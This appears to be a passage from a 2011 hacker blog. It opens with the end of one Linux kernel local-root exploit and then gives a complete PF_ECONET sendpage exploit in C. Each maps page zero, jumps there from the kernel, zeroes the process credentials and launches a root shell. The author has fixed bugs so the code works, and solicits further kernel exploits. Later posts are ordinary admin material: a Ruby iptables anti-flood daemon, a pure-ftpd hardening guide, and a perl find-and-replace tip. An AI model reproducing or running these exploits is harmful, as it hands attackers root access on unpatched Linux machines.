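 * the SELinux mmap_zero check); the mmap() failure path reports that.
 *
 * Fixes against the posted listing: the mkstemp() template must end in six
 * X's ("tmp.XX" fails with EINVAL before anything is attempted); the ppc32
 * branch truncated the pointer to 16 bits before shifting, so the high half
 * of the jump target was always 0; and the shell is only started once we
 * really are root instead of unconditionally.
 */
int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XXXXXX";
    unsigned long target;
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    addr = mmap(NULL, PAGE_SIZE, PROT_EXEC | PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    if (addr == MAP_FAILED) {
        perror("- mmap failed (page 0 not mappable?)");
        exit(EXIT_FAILURE);
    }
    target = (unsigned long)change_cred;
#if defined(__i386__) || defined(__x86_64__)
    {
        unsigned int disp = 8;   /* absolute address of the slot holding &change_cred */
#if defined(__LP64__)
        /* ff 24 25 disp32: jmp *disp32 (SIB form, no base/index register) */
        addr[0] = '\xff';
        addr[1] = '\x24';
        addr[2] = '\x25';
        memcpy(&addr[3], &disp, sizeof disp);
#else
        /* ff 25 disp32: jmp *disp32 */
        addr[0] = '\xff';
        addr[1] = '\x25';
        memcpy(&addr[2], &disp, sizeof disp);
#endif
        /* The page is zero-filled by mmap, so the bytes between the
         * displacement and the slot at 8 are 0, exactly as the original
         * pointer-sized stores left them. */
        memcpy(&addr[8], &target, sizeof target);
    }
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    /* ppc64: an indirect call goes through a function descriptor, so page 0
     * is turned into one whose entry word is change_cred's entry address
     * (the first word of change_cred's own descriptor) -- presumably the
     * ELFv1 ABI; verify on real hardware. */
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    /* lis r31,hi16 ; ori r31,r31,lo16 ; mtctr r31 ; bctr */
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)(target >> 16);
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)(target & 0xffff);
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
        perror("- socket");
        exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
        perror("- mkstemp");
        exit(EXIT_FAILURE);
    }
    if (unlink(template) == -1) {
        perror("- unlink");
        exit(EXIT_FAILURE);
    }
    /* sendfile() needs at least a page of input to hand to sendpage() */
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
        perror("- ftruncate");
        exit(EXIT_FAILURE);
    }
    /* On a vulnerable kernel the NULL sendpage lands in change_cred(), whose
     * -1 return value propagates back out of the kernel, so sendfile()
     * reports an error in the success case too.  Our ids are the only
     * reliable signal. */
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    if (getuid() != 0) {
        fprintf(stderr, "- still uid %lu: kernel not vulnerable or credentials not found\n",
                (unsigned long)getuid());
        exit(EXIT_FAILURE);
    }
    execl("/bin/sh", "sh", "-i", NULL);
    perror("- execl");
    exit(EXIT_FAILURE);
}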

NOTE: that can be added to BSD easily...

Finally, Econet, which usually fails but has worked on a few *select* 2011 kernels (very nice), and has been proven there.

/* PF_ECONET sendpage-raw local root exploit 2011
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

/*
 * Read the stack pointer of the calling context.  Forced inline, presumably
 * so that when change_cred() runs in kernel context (via the page mapped at
 * 0) this reports the kernel stack pointer rather than a frame of its own.
 */
#if defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("mr %0,%%r1" : "=r"(value));   /* r1 is the stack pointer on PowerPC */
    return value;
}
#elif defined(__LP64__) && (defined(__i386__) || defined(__x86_64__))
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("movq %%rsp,%0" : "=r"(value));
    return value;
}
#elif defined(__i386__) || defined(__x86_64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long value;
    __asm__ __volatile__("movl %%esp,%0" : "=r"(value));
    return value;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Locate the current task_struct.  Only meaningful in kernel context -- it
 * is reached from change_cred() through the page mapped at 0; from user
 * space these reads fault or return garbage.
 *
 * x86_64: the pointer is taken from offset 0 of the per-CPU area addressed
 * by %gs (presumably the 'pcurrent' slot of the 2.6.18-era x8664_pda --
 * verify for the target kernel).
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
/*
 * i386: derive the task from the kernel stack pointer.  Three layouts are
 * probed in order and the first candidate whose first word equals
 * TASK_RUNNING is accepted (assumes 'state' is the first task_struct field):
 *   1. 4 KiB stack with thread_info at its base and thread_info->task at
 *      offset 0, trusted only if that word looks like a kernel address
 *      (>= 0xc0000000, the default 3G/1G split);
 *   2. 8 KiB stack with task_struct itself at the base;
 *   3. 8 KiB stack with thread_info at the base.
 * Returns (unsigned long)-1 if nothing matched, in which case change_cred()
 * starts its scan from an invalid address.
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
/*
 * PowerPC: the kernel stack is assumed 16 KiB-aligned (64-bit) or
 * 8 KiB-aligned (32-bit).  The base is tried first as the task_struct
 * itself, then as a thread_info whose first word points to the task; a
 * candidate is accepted when its first word equals TASK_RUNNING.
 * Returns (unsigned long)-1 if neither matched.
 */
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
/* Real uid/gid of this process, filled in by main(); the credential block
 * inside task_struct is recognised by finding these values. */
static unsigned long uid, gid;

/* True when the eight 32-bit words at w read uid,uid,uid,uid,gid,gid,gid,gid
 * (presumably uid/euid/suid/fsuid then gid/egid/sgid/fsgid in the target
 * kernel's task_struct -- verify against the target layout). */
static inline int is_cred_block(const unsigned int *w) {
    int k;
    for (k = 0; k < 4; k++)
        if (w[k] != uid)
            return 0;
    for (k = 4; k < 8; k++)
        if (w[k] != gid)
            return 0;
    return 1;
}

/*
 * Runs in kernel context, reached through the page mapped at 0.  Scans
 * upward from the current task_struct for the credential block and zeroes
 * it, making every id root.  Always returns -1; there is no "not found"
 * exit -- if the pattern never appears the scan presumably runs off the end
 * of mapped memory and the kernel faults.
 */
static int change_cred(void) {
    unsigned int *w;
    for (w = (unsigned int *)current_task_struct(); w; w++) {
        if (is_cred_block(w)) {
            int k;
            for (k = 0; k < 8; k++)
                w[k] = 0;
            break;
        }
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
/* The PowerPC variant has no uid/gid to compare with: the first run of four
 * equal non-zero words followed by four equal words is taken to be the
 * credential block, which can false-positive on other data. */
static inline int is_cred_block(const unsigned int *w) {
    if (w[0] == 0)
        return 0;
    return w[0] == w[1] && w[0] == w[2] && w[0] == w[3]
        && w[4] == w[5] && w[4] == w[6] && w[4] == w[7];
}

/* Same contract as the x86 version: zero the first matching block, return -1. */
static int change_cred(void) {
    unsigned int *w;
    for (w = (unsigned int *)current_task_struct(); w; w++) {
        if (is_cred_block(w)) {
            int k;
            for (k = 0; k < 8; k++)
                w[k] = 0;
            break;
        }
    }
    return -1;
}
#endif
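#define PAGE_SIZE getpagesize() // want 2011, then use this or 4096!

/*
 * Map the zero page, plant a trampoline to change_cred() at address 0 and
 * trigger sock_sendpage() on a PF_ECONET raw socket whose proto_ops has no
 * sendpage, so the kernel calls NULL and runs our page with kernel
 * privileges; change_cred() then zeroes the task's ids.  The econet module
 * must be present (or auto-loadable) for socket() to succeed at all.
 *
 * Mapping page 0 must be permitted (vm.mmap_min_addr and, where present,
 * the SELinux mmap_zero check); the mmap() failure path reports that.
 *
 * Fixes against the posted listing: the mkstemp() template must end in six
 * X's ("tmp.XX" fails with EINVAL before anything is attempted); the ppc32
 * branch truncated the pointer to 16 bits before shifting, so the high half
 * of the jump target was always 0; and the shell is only started once we
 * really are root instead of unconditionally.
 */
int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XXXXXX";
    unsigned long target;
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    addr = mmap(NULL, PAGE_SIZE, PROT_EXEC | PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    if (addr == MAP_FAILED) {
        perror("- mmap failed (page 0 not mappable?)");
        exit(EXIT_FAILURE);
    }
    target = (unsigned long)change_cred;
#if defined(__i386__) || defined(__x86_64__)
    {
        unsigned int disp = 8;   /* absolute address of the slot holding &change_cred */
#if defined(__LP64__)
        /* ff 24 25 disp32: jmp *disp32 (SIB form, no base/index register) */
        addr[0] = '\xff';
        addr[1] = '\x24';
        addr[2] = '\x25';
        memcpy(&addr[3], &disp, sizeof disp);
#else
        /* ff 25 disp32: jmp *disp32 */
        addr[0] = '\xff';
        addr[1] = '\x25';
        memcpy(&addr[2], &disp, sizeof disp);
#endif
        /* The page is zero-filled by mmap, so the bytes between the
         * displacement and the slot at 8 are 0, exactly as the original
         * pointer-sized stores left them. */
        memcpy(&addr[8], &target, sizeof target);
    }
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    /* ppc64: an indirect call goes through a function descriptor, so page 0
     * is turned into one whose entry word is change_cred's entry address
     * (the first word of change_cred's own descriptor) -- presumably the
     * ELFv1 ABI; verify on real hardware. */
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    /* lis r31,hi16 ; ori r31,r31,lo16 ; mtctr r31 ; bctr */
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)(target >> 16);
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)(target & 0xffff);
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_ECONET, SOCK_RAW, 0)) == -1) { //my baby
        perror("- socket");
        exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
        perror("- mkstemp");
        exit(EXIT_FAILURE);
    }
    if (unlink(template) == -1) {
        perror("- unlink");
        exit(EXIT_FAILURE);
    }
    /* sendfile() needs at least a page of input to hand to sendpage() */
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
        perror("- ftruncate");
        exit(EXIT_FAILURE);
    }
    /* On a vulnerable kernel the NULL sendpage lands in change_cred(), whose
     * -1 return value propagates back out of the kernel, so sendfile()
     * reports an error in the success case too.  Our ids are the only
     * reliable signal. */
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    if (getuid() != 0) {
        fprintf(stderr, "- still uid %lu: kernel not vulnerable or credentials not found\n",
                (unsigned long)getuid());
        exit(EXIT_FAILURE);
    }
    execl("/bin/sh", "sh", "-i", NULL);
    perror("- execl");
    exit(EXIT_FAILURE);
}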

Again, enjoy the *properly* made versions. I am not taking credit for them, but I have definitely fixed some things and adjusted some releases which by now seem to be little more than fork bombs — I dislike that. Either release your privates (which may be fine even for ONE kernel, as I am doing) or don't; I am certainly after an OpenVZ kernel local exploit, and some kind of OpenVZ attack in general. If interested, email me here or PM me, whatever.
I can b found on efnet as xd-- / #haxnet or Undernet nickname xds #zombie channel
I look forward to anything new. At the moment I can safely say that everything up to 2010 I have covered in ONE neat setup of only four exploits, which is OK.
So I am trying to make a good BSD/Linux/x86_64/OpenVZ payload-style scanner; any input is welcome.

Note: i notice this site has HUGE ranks, so if your stuff got here, your damn lucky buddy!
xd

Anti-DDoS Ruby scripting which uses iptables and ip6tables, by xd

Posted on 11th October 2011 in Papers

OK, well: this was originally for oldish firewalls, but it can be used with CSF and APF easily enough, and I will make sure to show that in the code :) .
Mine are tested and working fine at the moment on an IPv4 and IPv6 box. I am still testing, but getting it to start up correctly was already a task!
It is beautiful to run: just create aa.rb, put the code in there, save it, `chmod +x aa.rb`, then `ruby aa.rb`. It will daemonise and show up in `ps aux` as `ruby aa.rb`. You can pre-create the log files (I would: `touch aa.log aa6.log; chmod 700 aa.rb aa6.rb aa.log aa6.log`). Note that it has to run as root, since it inserts iptables rules.

OK, let's go. For standard iptables on IPv4 this will catch attack- or brute-force-like connection floods and simply block individual IPs, so it is safer than blocking whole CIDR ranges. Then set up a policy; it is easy, so you can use `-F` (flush) safely when you need to.

Here is aa.rb

#aa.rb
#!/usr/bin/env ruby
# Attack v1 (xd-mod) - A Threaded (D)aemonisied (D)DoS-Deflate alternative written in Ruby for IPtables/IP6tables
# this is the Iptables version,and you can also use this for ipv6 simply make a copy of this file,and change this line:
# FIREWALL = "/usr/bin/ip6tables" ,and thats it!
# To revert to the old script wich relys on lame method using -d flag on csf/apf ,wich sucks and tested this, you add:
# FIREWALL = "csf"  ## or apf
# then below..
# `#{FIREWALL} -I INPUT -s #{ip} -j DROP` change this to: `#{FIREWALL} -d #{ip}`
# Thats it! Enjoy the modified anti-ddos tool wich is now finally working :)  BY #Haxnet@EFnet xd--
require 'logger'

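class Attack
        # The number of concurrent connections per IP
        CONNECTION_LIMIT = 10          ##can be upto 30 safely
        # The frequency (in seconds) that Attack checks the current connections
        FREQUENCY = 30
        # Iptables mod here (makesure to use FULL pathway to iptables/ip6tables for aa6.rb)
        FIREWALL = "/usr/bin/iptables" ##and for ipv6 script aa6.rb make this "/usr/bin/ip6tables" ,easy!
        # Connection checks and bans are logged here.
        LOG_FILE = "aa.log"
        # IP Whitelist: compared by exact string match against the address netstat
        # printed, so list plain addresses, not CIDR ranges.
        WHITELIST = %w{ 127.0.0.1 }    ##makesure to allow for your own net here (hosters/dedis/shells/vps)
        # Only a string that looks like an IP literal is ever handed to the firewall.
        ADDRESS_RE = /\A[0-9A-Fa-f:.]+\z/

        # Daemonises immediately and then polls forever; never returns.
        def initialize
                @log = Logger.new(LOG_FILE)
                @banned = {}   # ip => true, so each DROP rule is inserted once, not every cycle
                daemonize  ##ok lets damonise nice and silently so we dont make bash hang
                loop do
                        run
                        sleep(FREQUENCY)
                end
        end

        # Fresh "<count> <ip>" lines for the current foreign addresses.  The
        # original took this snapshot once in initialize, so every later cycle
        # re-examined the same stale list.
        def connections
                `netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n`
        end

        ## Iptables mod here
        # Inserts a DROP rule for every address over CONNECTION_LIMIT that is
        # neither whitelisted nor already banned by this process.
        # (each_line rather than each: String#each is gone in Ruby 1.9.)
        def check(connections)
                connections.each_line { |connection|
                        conn, ip = connection.split
                        next if ip.nil? or conn.to_i <= CONNECTION_LIMIT
                        next if WHITELIST.include? ip or @banned[ip]
                        unless ip =~ ADDRESS_RE
                                @log.warn "[IPT] Ignoring non-address field -> #{ip.inspect}"
                                next
                        end
                        # argv form, no shell: the netstat-derived string cannot inject commands
                        if system(FIREWALL, "-I", "INPUT", "-s", ip, "-j", "DROP")
                                @banned[ip] = true
                                @log.info "[IPT] Dropped -> #{ip} with -> #{conn} connections .."
                        else
                                @log.error "[IPT] #{FIREWALL} failed for -> #{ip} (status #{$?.inspect})"
                        end
                }
        end

        # One polling cycle.  The original spawned a thread and joined it at
        # once, which is the same as calling check directly.
        def run
                check connections
                @log.info "[IPT] Checked connections at -> #{Time.now} .."
        end

        protected
        # Classic double fork.  The log was opened before chdir "/", so the
        # relative LOG_FILE path resolves from the start directory.
        # NOTE(review): umask 0000 would make anything created from here on
        # world-writable; nothing is, but 0022 is the safer default.
        def daemonize
                exit if fork
                Process.setsid
                exit if fork
                Dir.chdir "/"
                File.umask 0000
                STDIN.reopen "/dev/null"
                STDOUT.reopen "/dev/null", "a"
                STDERR.reopen STDOUT
                trap("TERM") {
                        exit
                }
        end
end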
Attack.new  # constructing the object daemonises this process and never returns

…Here,the aa6.rb IP6Tables setup :) here ;

##aa6.rb to run alongside aa.rb
## AntiDDoS Ruby IP6tables mod by xd
require 'logger'

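class Attack
        # The number of concurrent connections per IP
        CONNECTION_LIMIT = 10                ##can be upto 30 safely
        # The frequency (in seconds) that Attack checks current connections
        FREQUENCY = 30
        # Ip6tables mod here (makesure to use FULL pathway to ip6tables)
        FIREWALL = "/usr/bin/ip6tables"
        # Connection checks and bans are logged here.
        LOG_FILE = "aa6.log"
        # IP Whitelist: compared by exact string match, so plain addresses only.
        # The original "::0\128 ::1\48 ::1\64" entries could never match anything.
        WHITELIST = %w{ 127.0.0.1 ::1 }  ##modded for IPv6
        # Only a string that looks like an IP literal is ever handed to the firewall.
        ADDRESS_RE = /\A[0-9A-Fa-f:.]+\z/

        # Daemonises immediately and then polls forever; never returns.
        def initialize
                @log = Logger.new(LOG_FILE)
                @banned = {}   # ip => true, so each DROP rule is inserted once, not every cycle
                daemonize                            ##ok lets damonise nice and silently so we dont make bash hang :>
                loop do
                        run
                        sleep(FREQUENCY)
                end
        end

        # Fresh "<count> <ip>" entries for IPv6 foreign addresses, taken on every
        # cycle (the original captured netstat once at start-up).  Parsed in Ruby
        # because "cut -d: -f1" keeps only the first hextet of an IPv6 address,
        # and Linux netstat -n labels IPv6 sockets tcp6/udp6 rather than "inet6",
        # so the original grep matched nothing -- verify against your own output.
        def connections
                counts = Hash.new(0)
                `netstat -ntu`.each_line { |line|
                        next unless line =~ /\A(tcp|udp)6\s/
                        foreign = line.split[4] or next
                        counts[foreign.sub(/:\d+\z/, '')] += 1   # strip only the trailing :port
                }
                counts.map { |ip, n| "#{n} #{ip}" }
        end

        ## Ip6tables mod here
        # Inserts a DROP rule for every address over CONNECTION_LIMIT that is
        # neither whitelisted nor already banned by this process.
        def check(connections)
                connections.each { |connection|
                        conn, ip = connection.split
                        next if ip.nil? or conn.to_i <= CONNECTION_LIMIT
                        next if WHITELIST.include? ip or @banned[ip]
                        unless ip =~ ADDRESS_RE
                                @log.warn "[IP6T] Ignoring non-address field -> #{ip.inspect}"
                                next
                        end
                        # argv form, no shell: the netstat-derived string cannot inject commands
                        if system(FIREWALL, "-I", "INPUT", "-s", ip, "-j", "DROP")
                                @banned[ip] = true
                                @log.info "[IP6T] Dropped -> #{ip} with -> #{conn} connects .."
                        else
                                @log.error "[IP6T] #{FIREWALL} failed for -> #{ip} (status #{$?.inspect})"
                        end
                }
        end

        # One polling cycle.  The original spawned a thread and joined it at
        # once, which is the same as calling check directly.
        def run
                check connections
                @log.info "[IP6T] Checked connections at -> #{Time.now} .."
        end

        protected
        # Classic double fork.  The log was opened before chdir "/", so the
        # relative LOG_FILE path resolves from the start directory.
        # NOTE(review): umask 0000 would make anything created from here on
        # world-writable; nothing is, but 0022 is the safer default.
        def daemonize
                exit if fork
                Process.setsid
                exit if fork
                Dir.chdir "/"
                File.umask 0000
                STDIN.reopen "/dev/null"
                STDOUT.reopen "/dev/null", "a"
                STDERR.reopen STDOUT
                trap("TERM") {
                        exit
                }
        end
end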
# Entry point: initialize daemonizes and then loops forever, so nothing after
# this line would ever run.
Attack.new

That's it folks! That's aa.rb and aa6.rb, and they both work :)

If you're thinking "but why Ruby?", do some timing once it is set up properly: it is fast enough for this job (one netstat pass per check interval) and far easier to write than C or asm. What makes it quick is blocking at the iptables level — the packets are dropped in the kernel, not by the script.
xd

Melrose PC Support // PC repairs/Maintenance // IT Consultant // Anti-Attack Services such as deployment-on-attack service // Much more..

PureFTPD SECURE Install using PureDB (Linux/BSD)

Posted on 11th October 2011 in Papers

Just a quick, handy tutorial I found, which I decided to use myself and extend with my own touches for BSD.
By xd

For Debian/Ubuntu/CentOS it is pretty straightforward: make sure OpenSSL is installed, then install pure-ftpd from the package manager (apt-get/yum). You can also remove the stock ftp client (/bin/ftp) if you don't need it, though that does nothing for the server's security. On BSD it is installed from the ports tree, /usr/ports/ftp/pure-ftpd/ (or pure-ftpd-ipv6/ if you want IPv6 forced — not required, there is a simpler way I'll outline later).
Let's begin the process. Pure-ftpd is configured from a directory of one-option-per-file settings; on some distributions (CentOS, I believe) it is a single pure-ftpd.conf instead, which takes the SAME option names and values, so you just have to map them across in /etc/. Debian uses the directory layout, which is what I work with below; it ports across easily enough.

OK lets begin, as i said, makesure you have things in order.. like openssl.. but it will prompt you in this howto anyhow ;)

root@box:~# cd /etc/pure-ftpd/conf/
root@box:/etc/pure-ftpd/conf# ls -la
total 24K
-rw-r--r-- 1 root 36 2007-06-22 02:01 AltLog
-rw-r--r-- 1 root 5 2007-06-22 02:01 MinUID
-rw-r--r-- 1 root 4 2007-06-22 02:01 NoAnonymous
-rw-r--r-- 1 root 4 2007-06-22 02:01 PAMAuthentication
-rw-r--r-- 1 root 28 2007-06-22 02:01 PureDB
-rw-r--r-- 1 root 3 2007-06-22 02:01 UnixAuthentication

Each of those files describes a commandline option of the pure-ftpd server.
For example, the file AltLog contains the format of,and path to the transfer log file:
root@box:/etc/pure-ftpd/conf# cat AltLog
clf:/var/log/pure-ftpd/transfer.log

Let’s now set some of the basic options by editing those one-liners (our server will listen to port 21 on all available interfaces, and will use IP 12.34.56.78 and ports 4500-4600 for passive mode – don’t forget to forward those from your NAT router if you are behind one):

root@box:/etc/pure-ftpd/conf# echo ,21 > Bind
root@box:/etc/pure-ftpd/conf# echo 12.34.56.78 > ForcePassiveIP
root@box:/etc/pure-ftpd/conf# echo 4500 4600 > PassivePortRange

Now for some recommended hardening options (note that BrokenClientsCompatibility, last in the list, is a compatibility relaxation rather than a security setting — enable it only if your clients actually need it):
root@box:/etc/pure-ftpd/conf# echo yes > ChrootEveryone
root@box:/etc/pure-ftpd/conf# echo yes > ProhibitDotFilesRead
root@box:/etc/pure-ftpd/conf# echo yes > ProhibitDotFilesWrite
root@box:/etc/pure-ftpd/conf# echo yes > NoChmod
root@box:/etc/pure-ftpd/conf# echo yes > BrokenClientsCompatibility

Let’s also set some limits to avoid abuse:
root@box:/etc/pure-ftpd/conf# echo 4 > MaxClientsPerIP
root@box:/etc/pure-ftpd/conf# echo 20 > MaxClientsNumber

Now the important thing we need to decide is what user authorization method(s) our server will support. Options include Unix Authentication (anyone with a login account on the server will have ftp access), but I chose PureDB authentication, which involves a dedicated pure-ftpd “virtual users” base.
So let’s disable Unix and PAM auth, set the path to the PureDB user file, and add PureDB as an auth method by linking to it from the /etc/pure-ftpd/auth directory:

root@box:/etc/pure-ftpd/conf# echo no > PAMAuthentication
root@box:/etc/pure-ftpd/conf# echo no > UnixAuthentication
root@box:/etc/pure-ftpd/conf# echo /etc/pure-ftpd/pureftpd.pdb > PureDB
root@box:/etc/pure-ftpd/conf# ln -s /etc/pure-ftpd/conf/PureDB ../auth/50pure

Let’s now create a (system) user and group that will be bound to all ftp virtual users. For security reasons, that special user should have no home directory (-d /dev/null) and no shell access (-s /bin/false) :

root@box:/etc/pure-ftpd/conf# groupadd -g 2001 ftpgroup
root@box:/etc/pure-ftpd/conf# useradd -u 2001 -s /bin/false -d /dev/null -c "pureftpd user" -g ftpgroup ftpuser

Now we use the pure-pw command to add our first virtual-user,
Virtual users never get a system account or a shell, so a leaked FTP password does not hand out a login on the box.

NOTE:
Don’t forget the “pure-pw mkdb” command:
it is required to commit/confirm changes to the user file

root@box:/etc/pure-ftpd/conf# pure-pw useradd myfirstuser -u ftpuser -d /var/ftp/public/
Password:
Enter it again:
root@box:/etc/pure-ftpd/conf# pure-pw mkdb
root@box:/etc/pure-ftpd/conf# apt-get install openssl
root@box:/etc/pure-ftpd/conf# echo 2 > TLS
root@box:/etc/pure-ftpd/conf# openssl req -x509 -nodes -newkey rsa:2048 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem
Generating a 2048 bit RSA private key

(TLS=1 merely accepts TLS and still allows cleartext logins, so passwords can cross the wire unencrypted; 2 refuses unencrypted control connections, and 3 additionally requires TLS on the data channel. A 1024-bit RSA key is too short for a new certificate — use 2048 or larger.)

…itll ask you a few questions, just answer and proceed…

root@box:/etc/pure-ftpd/conf# chmod 600 /etc/ssl/private/pure-ftpd.pem

OK we are done!
The server is in much better shape now. Keep managing users with pure-pw and the PureDB file: every FTP account maps to the single locked-down ftpuser uid, and with ChrootEveryone each session is confined to its own directory instead of having the run of /home on the box.

Let’s finally restart the server with our all-new config :

root@box:/etc/pure-ftpd/conf# /etc/init.d/pure-ftpd restart

Also note -6 will FORCE Ipv6 if you wish this, then i recommend googling a IPv6 install guide, altho on bsd, it is just a matter of using the pure-ftpd-ipv6 port :-) .
xd

Ok so, here we can do a small mod, and make a simple script:

This will be good for starting it up…

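#!/bin/bash
# Starts pure-ftpd with the same settings the conf/ directory sets up:
#   -l puredb:...          virtual users from the PureDB file
#   -X / -x / -R / -E / -A no dot-file access, no chmod, no anonymous, chroot all
#   -S ,21 / -P / -p       bind, forced passive IP and passive port range
#   -C 4 / -c 20 / -u 1000 per-IP and total client limits, minimum uid
#   -O clf:... / -b / -B   transfer log, broken-client compatibility, daemonize
#   -Y 2                   require TLS on the control channel (-Y 1, as the
#                          original had, still accepts cleartext logins; use 3
#                          to force TLS on the data channel as well)
# The original script had "#!bin/bash" (no leading slash) and an unterminated
# echo string, so it could not run as written.
echo "starting PureFTPd in SSL-TLS/Passive mode on all devices on port 21 .."
/usr/sbin/pure-ftpd -l puredb:/etc/pure-ftpd/pureftpd.pdb -X -b -u 1000 -C 4 -E -S ,21 -x -c 20 -R -A -p 4500:4600 -O clf:/var/log/pure-ftpd/transfer.log -Y 2 -P 12.34.56.78 -B || { echo "pure-ftpd failed to start" >&2; exit 1; }
echo "Started PureFTPd Ok .."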

…thats it!

Enjoy the pure-ftpd server. As I said, adjust for your OS: Debian uses the conf/ directory, and BSD is just as simple but sometimes wants a pure-ftpd.conf, which holds the same settings in one file. For IPv6 you can force it from the command line in ftp.sh by adding -6, and it will work, but make sure your resolver can do reverse lookups for both IPv6 and IPv4!
xd loves j00

Mass find-and-replace text in files in Linux using perl cmds (reedit)

Posted on 4th October 2011 in Papers

How do I mass find and replace text in files under linux using perl?

Few friends have asked me how to do mass find and replace text in files under linux. There are quite a bit of options in linux to achieve mass replacing of text in files.
If you are doing it file by file, you can achieve that in vi by opening, running replace and closing and going to next file. But sometimes that can be very tedious and you would rather do mass replacement on all files containing certain extension.
We can do this by using sed or perl. Since most people are familiar with perl (at least most system admins and programmers), I will show you a perl way of doing it which you can use with sed as well if you wish.
First step is to get perl to do what we want on one file:

perl -w -i -p -e "s/search_text/replace_text/g" filename

-w turns warnings on
-i makes Perl operate on files in-place
(if you would like to make backups,use -i.bak,
this will save filename.bak files)
-p loops over the whole input
-e specifies Perl expression
filename works on one file at a time

Once we get the results we want, we can now pass it multiple files by doing something like:

perl -w -i -p -e "s/search_text/replace_text/g" *.php

This will search and replace within all php files in the directory you are in.

Now, let us say you want to go through your whole web directory and replace every place where you have “Perl is good” to “Perl is great”, you would use following command:

find /www_root -name "*.php" -print0 | xargs -0 perl -w -i -p -e "s/Perl is good/perl is great/g"

find starts at /www_root and lists every file whose name ends in .php; xargs hands those names to perl as arguments. The -print0/-0 pair separates names with NUL bytes, so paths containing spaces or newlines reach perl intact instead of being split into separate, wrong arguments. Remember that the search half of s/// is a regular expression, so escape metacharacters such as . * ( ) in the search text.

Read more: http://crazytoon.com/2007/10/29/linux-how-do-i-mass-find-and-replace-text-in-files-under-linux-using-perl/#ixzz1ZrT0WJim

Thx to Sonny for the help on some of this, as i have a .sh script wich does same.. i figured, easier to find something in perl,using regexp etc… and this is old but still great =)
Cheers,
xd